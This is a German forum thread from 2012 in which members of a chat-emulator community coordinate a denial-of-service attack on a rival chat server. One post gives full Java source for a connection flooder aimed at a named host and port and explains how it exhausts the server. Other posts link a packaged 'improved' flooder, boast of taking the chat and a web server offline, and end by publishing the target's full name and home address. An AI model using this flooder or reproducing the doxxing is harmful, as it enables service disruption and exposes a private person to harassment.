Du bist nicht angemeldet.

Lieber Besucher, herzlich willkommen bei: Banana-Coding.com - Java Knuddels Emulator. Falls dies dein erster Besuch auf dieser Seite ist, lies bitte die Hilfe durch. Dort wird dir die Bedienung dieser Seite näher erläutert. Darüber hinaus solltest du dich registrieren, um alle Funktionen dieser Seite nutzen zu können. Benutze das Registrierungsformular, um dich zu registrieren oder informiere dich ausführlich über den Registrierungsvorgang. Falls du dich bereits zu einem früheren Zeitpunkt registriert hast, kannst du dich hier anmelden.

31

Freitag, 9. März 2012, 23:31

Darf man den Chat ein wenig unter DDos setzen? :D Leider hab ich selber noch keine Lücken gefunden um diesen zu "ownen". :(

32

Samstag, 10. März 2012, 00:04

Nimm doch meinen damals veroeffentlihten Flooder xD 2-3 Stueck laufen lassen und gut ist.
Schade dass es viele seiten ned gibt, sonst koennte man n bissl xss'sen

Localhost

Ehemaliger Supporter

Beiträge: 345

Wohnort: 127.0.0.1

  • Private Nachricht senden

33

Samstag, 10. März 2012, 08:27

Lad den am besten nochmal hoch, Bizzi.
No support via message.

"Der gute Programmierer ist nicht der, der keine Fehler macht, sondern der, der seine Fehler rasch findet und behebt."

34

Samstag, 10. März 2012, 08:47

Haben glück, habs noch bei meinen Backups gefunden :-P

Hier:

Java-Quelltext

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;


public class Flooder {

	/**
	 * @author Blizzard
	 */
	public static void main(String[] args) {
		flooding("knuffelchat.de", 2710);
	}
	
	public static void flooding(String host, int port) {
		int instances = 0;
		  while(true){
			   
			 try {
				 System.out.println("new flooding");
				 Socket socket = new Socket(host, port);
				 OutputStream out = socket.getOutputStream();
				 InputStream in = socket.getInputStream();
				 while(true) {
					 byte[] len = new byte[] { (byte) 0 };
					 out.write(len);
					 int length = in.available();
					 final byte[] bytes = new byte[(int) length];
					 out.write(bytes);
					 System.out.println(in.read(bytes, 0, bytes.length));
				 }
			 } catch (IOException e) {
			    System.out.println("ERR " + e.getMessage());
			     
			 }
			 
			 instances++;
			 if(instances >= 500) {
				 break;
			 }
		  }
	}
}


Ist eig recht einfach.. Eine While-Schleife führt X Connections direkt nacheinander aus.. Es wird nen NULL-Byte gesendet, damit der Chatserver ein Connect weiterverarbeitet. Da nix weiteres mehr gesendet wird, die Connection aber aufgehalten wird, gehen dem Server schnell die Ressourcen flöten ^^ Besonders wenn der Chat nur für wenige Leute ausgelegt ist, besonders wenn der so verbuggt ist, wie der von Witti xD

Es haben sich bereits 3 registrierte Benutzer bedankt.

Benutzer, die sich für diesen Beitrag bedankt haben:

Spectra, Flav, Dome

35

Samstag, 10. März 2012, 09:12

Chat Down xD
Hab mal nen besseren Flooder geschrieben.. Veröffentliche des gleich.

Es hat sich bereits 1 registrierter Benutzer bedankt.

Benutzer, die sich für diesen Beitrag bedankt haben:

Flav

36

Samstag, 10. März 2012, 10:26

So und hier der neue und verbesserte Flooder ;)
Direkt als Runnable-JAR gepackt, wenn man kein Bock hat selbst zu kompilieren.



Hier die Runnable:
https://rapidshare.com/files/2476611147/BananaFlooder.jar

Hier die Source:
https://rapidshare.com/files/2075076888/…Flooder.src.zip

Rein Theoretisch kann des Teil auch zum Flooden von anderen Diensten genutzt werden... Einfach mal ausprobieren ^^

Edit:
Hab mal den Webserver damit getestet.. Endweder der junge ist dumm oder keine Ahnung,.. Ich glaub mit dem Billigen Tool kriegt man auch seinen Webserver platt xD

Es haben sich bereits 5 registrierte Benutzer bedankt.

Benutzer, die sich für diesen Beitrag bedankt haben:

Flav, CraZE, wishdream, KevStar, Diebspiel

37

Samstag, 10. März 2012, 17:40

Angriffsfläche bietet natürlich auch noch das Registrations-Applet.
:)
MfG

38

Samstag, 10. März 2012, 21:30

Ich bekomme den Chat inzwischen alleine mit ~360 Connection down. ;) Habe den Flooder dafür ein wenig modifiziert.

Es hat sich bereits 1 registrierter Benutzer bedankt.

Benutzer, die sich für diesen Beitrag bedankt haben:

Flav

39

Samstag, 10. März 2012, 21:57

Da Herr Wittkemper weiterhin gegen das Copyright verstößt und nicht bereit ist mit uns zu verhandeln, wurde sein Chat erstmal offline genommen, bis er uns bezüglich einer Einigung kontaktiert.

Bye...
Kein Support per PN. Nur im Forum!

Es haben sich bereits 3 registrierte Benutzer bedankt.

Benutzer, die sich für diesen Beitrag bedankt haben:

Diebspiel, wishdream, Flav

40

Samstag, 10. März 2012, 22:44

Zur kleinen Info an Witti: Du brauchst deine Domain nicht auf unsere IP zu pointen. Ich floode deine IP und nicht deinen Hostname.
Wer ihn gerne mal besuchen möchte, hier ist die Adresse:
Andre Wittkemper
Siegtalstrasse 158
57080 Siegen

MfG